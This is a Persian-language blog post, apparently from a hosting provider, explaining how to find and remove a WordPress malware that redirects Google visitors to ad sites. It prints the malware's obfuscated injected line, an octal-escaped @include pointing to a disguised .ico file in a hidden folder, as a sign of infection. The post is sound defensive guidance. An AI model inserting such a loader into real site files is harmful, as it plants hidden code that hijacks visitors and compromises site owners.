آموزش حذف ویروس ریدایرکت ورودی گوگل از وردپرس
با آموزش حذف ویروس ریدایرکت ورودی گوگل در خدمت شما هستیم .آلوده شدن سایت وردپرسی ویا به اصطلاح ویروسی شدن مشکلات زیادی را برای مدیر و کل مجموعه یک سایت ایجاد میکند یکی از بدترین ویروس های وردپرس را میتوان همین ویروس جدیدی که به تازگی در حال آلوده کردن سایت های وردپرسی است اشاره کرد که ورودی گوگل شما را هدف میگیرد و بازدید شمارا به سایت های تبلیغاتی هدایت میکند. با وبلاگ هاستینجا همراه باشید
نحوه عملکرد ویروس به صورتی است که شاید خیلی سریع متوجه نشوید اما اگر ورودی گوگل شما به شدت افت کرد حتما به ویروسی شدن سایت خود شک کنید و به دنبال رفع این مشکل باشید این ویروس جدید برای هر IP یک بار تبلیغ را نمایش میدهد برای مثال شما اسم سایت خود را در گوگل سرچ میکنید و وقتی روی آن میزنید انتظار دارید سایت شما اجرا شود اما این ویروس وقتی هنوز سایت شما لود نشده سریعا به سایت های تبلیغاتی و… شمارا هدایت میکند ما امروز در هاستیجا میخواهیم به شما آموزش دهیم که چگونه بتوانید این ویروس را بدون هیچ مشکلی از وردپرس حذف کنید در ادامه با هاستینجا همراه باشید.
آموزش حذف ویروس ریدایرکت ورودی گوگل سایت وردپرس :
ابتدا وارد سی پنل شوید سپس به محلی که وردپرس را نصب کردید مراجعه کنید و فایل wp-config.php از طریق ادیت کردن بازکنید بعد از باز شدن اگر در قسمت بالایی کد wp-config.php قطعه کد عجیبی دید که به شکل زیر بود یعنی سایت شما مورد حمله این ویروس قرار گرفته است .
1 |
@include "\057h\157m\145/\141n\144r\157i\144s\057p\165b\154i\143_\150t\155l\057.\167e\154l\055k\156o\167n\057.\067a\143f\0627\062c\056i\143o"; |
اما همانطور که مشاهده میکنید با این قطعه کد چیزی مشخص نیست در اصل این کد به یک فایل اشاره میکند که محل ریشه اصلی ویروس است و ما باید این کد را به کمک سایتی تبدیل به یک آدرس کنیم ابتدا وارد سایت زیر شوید:
https://malwaredecoder.com/
همانطور که در تصویر بالا مشاهده میکنید کد نامفهموم در فایل wp-config.php را کپی کردیم و در سایت معرفی شده دیکود کردیم حالا آدرس پوشه ریشه اصلی این ویروس رو در قسمت دی کد شده میتوانیم مشاهده کنیم برای مثال در این جا پوشه ای با نام .well-known محل ریشه اصلی ویروس بود که با حذف این پوشه بخش اصلی از این ویروس حذف میشود اما کار همینجا تمام نمیشود شما باید قسمت بالای تمامی فایل های وردپرس رو چک کنید و اگر از این دست از کد ها بود حذف کنید .
اما پوشه های دیگری که این ویروس میسازد بسیار شبیه به پوشه های عادی موجود در سی پنل میباشد برای مثال پوشه ای در سی پنل یک سایت آلوده وجود داشت که نام آن wordpress بود و با باز کردن دو فایل PHP در آن وجود داشت که هردو آلوده به این کد ویروس بودند به صورت کلی فایل های آلوده موجود در سی پنل این سایت در تصویر زیر وجود دارد که میتوانید در صورت مشاهده این فایل ها و برسی درون این فایل ها از ویروسی بودن سایت خود مطمئن شوید.
بعد از حذف کردن کد ها و فایل های آلوده خواهید دید که روند ورودی گوگل شما به حالت عادی باز خواهد گشت. در صورت مشکل میتوانید در نظرات سوال خود را با هاستینجا در میان بگذارید.
هشدار: هر افزونه ای را نصب نکنید خیلی از افزونه های نال شده و کرک شده متاسفانه عامل اصلی ویروسی شدن سایت های وردپرسی هستند. همیشه افزونه های خود را بروز کنید و وردپرس را بروز نگه دارید.